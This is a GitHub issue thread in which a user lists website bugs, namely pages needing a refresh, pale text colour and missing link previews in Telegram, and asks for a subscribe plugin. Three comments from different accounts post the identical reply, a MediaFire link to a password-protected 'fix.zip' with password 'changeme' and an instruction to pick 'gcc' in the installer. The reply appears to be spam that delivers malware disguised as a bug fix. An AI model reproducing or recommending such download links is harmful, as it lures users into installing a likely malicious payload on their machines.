### ISSUE TITLE
Some bugs are on the website

### ISSUE THREAD

**Issue by Sinusealpha** [MedX-Media/MedX#21]
Responsible: @aref-asadi 
Deadline: 28 Aug

Description:

These are some new bugs in the website and please fix them as soon as possible. Our traffic is going to rise in the next few days and these bugs shouldn't be there.

What I have found:
- we have to refresh in every session to be load. I mean that when we want to change any page of a website, we have to refresh and that's super bad!
- our text’s color isn't black. Or at least it isn't black enough to make a good view.
- when we share links to the website, we can not see their previews. For example in telegram. We previously had this option but it doesn't work right now.

these are bugs. we have to add a "subscribe" pluging for the prople who come to the website as soon as possible and you @aref-asadi can issue it, if ok. thanks a lot.

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
